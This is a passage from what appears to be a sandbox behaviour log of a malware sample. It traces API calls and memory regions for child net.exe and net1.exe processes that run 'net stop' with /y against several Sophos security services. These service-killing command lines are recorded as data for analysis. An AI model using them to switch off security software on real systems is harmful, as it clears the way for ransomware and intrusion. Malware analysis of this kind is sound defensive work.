_String2="Sophos File Scanner Service") returned -5 [0082.507] _wcsupr (in: _String="Sophos File Scanner Service" | out: _String="SOPHOS FILE SCANNER SERVICE") returned="SOPHOS FILE SCANNER SERVICE" [0082.507] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x9ce30 [0082.510] GetServiceKeyNameW (in: hSCManager=0x9ce30, lpDisplayName="SOPHOS FILE SCANNER SERVICE", lpServiceName=0xffdf5750, lpcchBuffer=0x28fa28 | out: lpServiceName="", lpcchBuffer=0x28fa28) returned 0 [0082.511] _wcsicmp (_String1="msg", _String2="SOPHOS FILE SCANNER SERVICE") returned -6 [0082.511] _wcsicmp (_String1="messenger", _String2="SOPHOS FILE SCANNER SERVICE") returned -6 [0082.511] _wcsicmp (_String1="receiver", _String2="SOPHOS FILE SCANNER SERVICE") returned -1 [0082.511] _wcsicmp (_String1="rcv", _String2="SOPHOS FILE SCANNER SERVICE") returned -1 [0082.511] _wcsicmp (_String1="redirector", _String2="SOPHOS FILE SCANNER SERVICE") returned -1 [0082.511] _wcsicmp (_String1="redir", _String2="SOPHOS FILE SCANNER SERVICE") returned -1 [0082.511] _wcsicmp (_String1="rdr", _String2="SOPHOS FILE SCANNER SERVICE") returned -1 [0082.511] _wcsicmp (_String1="workstation", _String2="SOPHOS FILE SCANNER SERVICE") returned 4 [0082.511] _wcsicmp (_String1="work", _String2="SOPHOS FILE SCANNER SERVICE") returned 4 [0082.511] _wcsicmp (_String1="wksta", _String2="SOPHOS FILE SCANNER SERVICE") returned 4 [0082.511] _wcsicmp (_String1="prdr", _String2="SOPHOS FILE SCANNER SERVICE") returned -3 [0082.512] _wcsicmp (_String1="devrdr", _String2="SOPHOS FILE SCANNER SERVICE") returned -15 [0082.512] _wcsicmp (_String1="lanmanworkstation", _String2="SOPHOS FILE SCANNER SERVICE") returned -7 [0082.512] _wcsicmp (_String1="server", _String2="SOPHOS FILE SCANNER SERVICE") returned -10 [0082.512] _wcsicmp (_String1="svr", _String2="SOPHOS FILE SCANNER SERVICE") returned 7 [0082.512] _wcsicmp (_String1="srv", _String2="SOPHOS FILE SCANNER SERVICE") returned 3 [0082.512] _wcsicmp (_String1="lanmanserver", _String2="SOPHOS FILE SCANNER SERVICE") returned -7 [0082.512] _wcsicmp (_String1="alerter", _String2="SOPHOS FILE SCANNER SERVICE") returned -18 [0082.512] _wcsicmp (_String1="netlogon", _String2="SOPHOS FILE SCANNER SERVICE") returned -5 [0082.512] NetServiceControl (in: servername=0x0, service="SOPHOS FILE SCANNER SERVICE", opcode=0x0, arg=0x0, bufptr=0x28fa30 | out: bufptr=0x28fa30) returned 0x889 [0082.527] wcscpy_s (in: _Destination=0xffdf80d0, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0082.527] LoadLibraryW (lpLibFileName="NETMSG") returned 0x75280000 [0082.528] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x75280000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0xffdf5b50, nSize=0x800, Arguments=0xffdf7f90 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0082.529] GetFileType (hFile=0xb) returned 0x2 [0082.529] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x28f8f8 | out: lpMode=0x28f8f8) returned 1 [0082.530] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xffdf5b50*, nNumberOfCharsToWrite=0x1e, lpNumberOfCharsWritten=0x28f8f0, lpReserved=0x0 | out: lpBuffer=0xffdf5b50*, lpNumberOfCharsWritten=0x28f8f0*=0x1e) returned 1 [0082.530] GetFileType (hFile=0xb) returned 0x2 [0082.530] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x28f8f8 | out: lpMode=0x28f8f8) returned 1 [0082.530] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xffdd1efc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x28f8f0, lpReserved=0x0 | out: lpBuffer=0xffdd1efc*, lpNumberOfCharsWritten=0x28f8f0*=0x2) returned 1 [0082.530] _ultow (in: _Dest=0x889, _Radix=2685280 | out: _Dest=0x889) returned="2185" [0082.530] FormatMessageW (in: dwFlags=0x2800, lpSource=0x75280000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0xffdf5b50, nSize=0x800, Arguments=0xffdf7f90 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0082.531] GetFileType (hFile=0xb) returned 0x2 [0082.531] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x28f8f8 | out: lpMode=0x28f8f8) returned 1 [0082.531] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xffdf5b50*, nNumberOfCharsToWrite=0x34, lpNumberOfCharsWritten=0x28f8f0, lpReserved=0x0 | out: lpBuffer=0xffdf5b50*, lpNumberOfCharsWritten=0x28f8f0*=0x34) returned 1 [0082.531] GetFileType (hFile=0xb) returned 0x2 [0082.531] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x28f8f8 | out: lpMode=0x28f8f8) returned 1 [0082.531] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xffdd1efc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x28f8f0, lpReserved=0x0 | out: lpBuffer=0xffdd1efc*, lpNumberOfCharsWritten=0x28f8f0*=0x2) returned 1 [0082.532] NetApiBufferFree (Buffer=0x9c100) returned 0x0 [0082.532] NetApiBufferFree (Buffer=0x9c120) returned 0x0 [0082.532] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop \"Sophos File Scanner Service\" /y" [0082.532] exit (_Code=2) Process: id = "63" image_name = "net.exe" filename = "c:\\windows\\system32\\net.exe" page_root = "0x230b7000" os_pid = "0xf50" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x954" cmd_line = "\"C:\\Windows\\System32\\net.exe\" stop \"Sophos MCS Client\" /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 4036 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 4037 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 4038 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 4039 start_va = 0xb0000 end_va = 0x12ffff entry_point = 0x0 region_type = private name = "private_0x00000000000b0000" filename = "" Region: id = 4040 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 4041 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 4042 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 4043 start_va = 0xff5a0000 end_va = 0xff5bbfff entry_point = 0xff5a0000 region_type = mapped_file name = "net.exe" filename = "\\Windows\\System32\\net.exe" (normalized: "c:\\windows\\system32\\net.exe") Region: id = 4044 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 4045 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 4046 start_va = 0x7fffffd7000 end_va = 0x7fffffd7fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd7000" filename = "" Region: id = 4047 start_va = 0x7fffffde000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 4048 start_va = 0x300000 end_va = 0x3fffff entry_point = 0x0 region_type = private name = "private_0x0000000000300000" filename = "" Region: id = 4049 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 4050 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Thread: id = 397 os_tid = 0xf70 Process: id = "64" image_name = "net.exe" filename = "c:\\windows\\system32\\net.exe" page_root = "0x22fd9000" os_pid = "0xff8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x954" cmd_line = "\"C:\\Windows\\System32\\net.exe\" stop \"Sophos Message Router\" /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 4051 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 4052 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 4053 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 4054 start_va = 0x210000 end_va = 0x28ffff entry_point = 0x0 region_type = private name = "private_0x0000000000210000" filename = "" Region: id = 4055 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 4056 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 4057 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 4058 start_va = 0xff5a0000 end_va = 0xff5bbfff entry_point = 0xff5a0000 region_type = mapped_file name = "net.exe" filename = "\\Windows\\System32\\net.exe" (normalized: "c:\\windows\\system32\\net.exe") Region: id = 4059 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 4060 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 4061 start_va = 0x7fffffdc000 end_va = 0x7fffffdcfff entry_point = 0x0 region_type = private name = "private_0x000007fffffdc000" filename = "" Region: id = 4062 start_va = 0x7fffffde000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 4063 start_va = 0x3f0000 end_va = 0x4effff entry_point = 0x0 region_type = private name = "private_0x00000000003f0000" filename = "" Region: id = 4064 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 4065 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Thread: id = 400 os_tid = 0xfd8 Process: id = "65" image_name = "net.exe" filename = "c:\\windows\\system32\\net.exe" page_root = "0x21df9000" os_pid = "0xfdc" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x954" cmd_line = "\"C:\\Windows\\System32\\net.exe\" stop \"Sophos Safestore Service\" /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 4068 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 4069 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 4070 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 4071 start_va = 0x130000 end_va = 0x1affff entry_point = 0x0 region_type = private name = "private_0x0000000000130000" filename = "" Region: id = 4072 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 4073 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 4074 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 4075 start_va = 0xff5a0000 end_va = 0xff5bbfff entry_point = 0xff5a0000 region_type = mapped_file name = "net.exe" filename = "\\Windows\\System32\\net.exe" (normalized: "c:\\windows\\system32\\net.exe") Region: id = 4076 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 4077 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 4078 start_va = 0x7fffffdd000 end_va = 0x7fffffdefff entry_point = 0x0 region_type = private name = "private_0x000007fffffdd000" filename = "" Region: id = 4079 start_va = 0x7fffffdf000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffdf000" filename = "" Region: id = 4080 start_va = 0x370000 end_va = 0x46ffff entry_point = 0x0 region_type = private name = "private_0x0000000000370000" filename = "" Region: id = 4081 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 4082 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 4343 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 4344 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 4345 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 4346 start_va = 0x1b0000 end_va = 0x2affff entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 4347 start_va = 0x2c0000 end_va = 0x2cffff entry_point = 0x0 region_type = private name = "private_0x00000000002c0000" filename = "" Region: id = 4348 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 4349 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 4350 start_va = 0x7fef8ed0000 end_va = 0x7fef8ee1fff entry_point = 0x7fef8ed0000 region_type = mapped_file name = "browcli.dll" filename = "\\Windows\\System32\\browcli.dll" (normalized: "c:\\windows\\system32\\browcli.dll") Region: id = 4351 start_va = 0x7fefaaa0000 end_va = 0x7fefaab7fff entry_point = 0x7fefaaa0000 region_type = mapped_file name = "mpr.dll" filename = "\\Windows\\System32\\mpr.dll" (normalized: "c:\\windows\\system32\\mpr.dll") Region: id = 4352 start_va = 0x7fefaf50000 end_va = 0x7fefaf5afff entry_point = 0x7fefaf50000 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll") Region: id = 4353 start_va = 0x7fefaf60000 end_va = 0x7fefaf86fff entry_point = 0x7fefaf60000 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll") Region: id = 4354 start_va = 0x7fefb7c0000 end_va = 0x7fefb7d3fff entry_point = 0x7fefb7c0000 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\System32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll") Region: id = 4355 start_va = 0x7fefb7e0000 end_va = 0x7fefb7f4fff entry_point = 0x7fefb7e0000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 4356 start_va = 0x7fefb800000 end_va = 0x7fefb80bfff entry_point = 0x7fefb800000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 4357 start_va = 0x7fefd3b0000 end_va = 0x7fefd3d2fff entry_point = 0x7fefd3b0000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 4358 start_va = 0x7fefdb10000 end_va = 0x7fefdbaefff entry_point = 0x7fefdb10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 4359 start_va = 0x7fefe330000 end_va = 0x7fefe34efff entry_point = 0x7fefe330000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 4360 start_va = 0x7feff2d0000 end_va = 0x7feff2d7fff entry_point = 0x7feff2d0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 4361 start_va = 0x7feff740000 end_va = 0x7feff81afff entry_point = 0x7feff740000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 4362 start_va = 0x7feff820000 end_va = 0x7feff94cfff entry_point = 0x7feff820000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Thread: id = 402 os_tid = 0xff4 Process: id = "66" image_name = "net1.exe" filename = "c:\\windows\\system32\\net1.exe" page_root = "0x22ff5000" os_pid = "0xf60" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "56" os_parent_pid = "0x8a8" cmd_line = "C:\\Windows\\system32\\net1 stop \"Sophos Device Control Service\" /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 4103 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 4104 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 4105 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 4106 start_va = 0x50000 end_va = 0xcffff entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 4107 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 4108 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 4109 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 4110 start_va = 0xffc40000 end_va = 0xffc72fff entry_point = 0xffc40000 region_type = mapped_file name = "net1.exe" filename = "\\Windows\\System32\\net1.exe" (normalized: "c:\\windows\\system32\\net1.exe") Region: id = 4111 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 4112 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 4113 start_va = 0x7fffffd5000 end_va = 0x7fffffd5fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd5000" filename = "" Region: id = 4114 start_va = 0x7fffffde000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 4115 start_va = 0xd0000 end_va = 0x1cffff entry_point = 0x0 region_type = private name = "private_0x00000000000d0000" filename = "" Region: id = 4116 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 4117 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 4160 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 4161 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 4162 start_va = 0x1d0000 end_va = 0x236fff entry_point = 0x1d0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 4163 start_va = 0x240000 end_va = 0x33ffff entry_point = 0x0 region_type = private name = "private_0x0000000000240000" filename = "" Region: id = 4164 start_va = 0x420000 end_va = 0x42ffff entry_point = 0x0 region_type = private name = "private_0x0000000000420000" filename = "" Region: id = 4165 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 4166 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 4167 start_va = 0x7fef7330000 end_va = 0x7fef7356fff entry_point = 0x7fef7330000 region_type = mapped_file name = "ntdsapi.dll" filename = "\\Windows\\System32\\ntdsapi.dll" (normalized: "c:\\windows\\system32\\ntdsapi.dll") Region: id = 4168 start_va = 0x7fef8260000 end_va = 0x7fef8271fff entry_point = 0x7fef8260000 region_type = mapped_file name = "browcli.dll" filename = "\\Windows\\System32\\browcli.dll" (normalized: "c:\\windows\\system32\\browcli.dll") Region: id = 4169 start_va = 0x7fefb050000 end_va = 0x7fefb05bfff entry_point = 0x7fefb050000 region_type = mapped_file name = "dsrole.dll" filename = "\\Windows\\System32\\dsrole.dll" (normalized: "c:\\windows\\system32\\dsrole.dll") Region: id = 4170 start_va = 0x7fefb7c0000 end_va = 0x7fefb7d3fff entry_point = 0x7fefb7c0000 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\System32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll") Region: id = 4171 start_va = 0x7fefb7e0000 end_va = 0x7fefb7f4fff entry_point = 0x7fefb7e0000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 4172 start_va = 0x7fefb800000 end_va = 0x7fefb80bfff entry_point = 0x7fefb800000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 4173 start_va = 0x7fefb810000 end_va = 0x7fefb825fff entry_point = 0x7fefb810000 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll") Region: id = 4174 start_va = 0x7fefc0a0000 end_va = 0x7fefc0bcfff entry_point = 0x7fefc0a0000 region_type = mapped_file name = "samlib.dll" filename = "\\Windows\\System32\\samlib.dll" (normalized: "c:\\windows\\system32\\samlib.dll") Region: id = 4175 start_va = 0x7fefcca0000 end_va = 0x7fefcccffff entry_point = 0x7fefcca0000 region_type = mapped_file name = "logoncli.dll" filename = "\\Windows\\System32\\logoncli.dll" (normalized: "c:\\windows\\system32\\logoncli.dll") Region: id = 4176 start_va = 0x7fefd3b0000 end_va = 0x7fefd3d2fff entry_point = 0x7fefd3b0000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 4177 start_va = 0x7fefdb10000 end_va = 0x7fefdbaefff entry_point = 0x7fefdb10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 4178 start_va = 0x7fefe330000 end_va = 0x7fefe34efff entry_point = 0x7fefe330000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 4179 start_va = 0x7feff2d0000 end_va = 0x7feff2d7fff entry_point = 0x7feff2d0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 4180 start_va = 0x7feff490000 end_va = 0x7feff4dcfff entry_point = 0x7feff490000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 4181 start_va = 0x7feff740000 end_va = 0x7feff81afff entry_point = 0x7feff740000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 4182 start_va = 0x7feff820000 end_va = 0x7feff94cfff entry_point = 0x7feff820000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 4183 start_va = 0x75290000 end_va = 0x75291fff entry_point = 0x75290000 region_type = mapped_file name = "netmsg.dll" filename = "\\Windows\\System32\\netmsg.dll" (normalized: "c:\\windows\\system32\\netmsg.dll") Thread: id = 406 os_tid = 0xf38 [0083.250] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xcfa90 | out: lpSystemTimeAsFileTime=0xcfa90*(dwLowDateTime=0xe6ca2cf0, dwHighDateTime=0x1d48689)) [0083.250] GetCurrentProcessId () returned 0xf60 [0083.250] GetCurrentThreadId () returned 0xf38 [0083.250] GetTickCount () returned 0x1eb19 [0083.250] 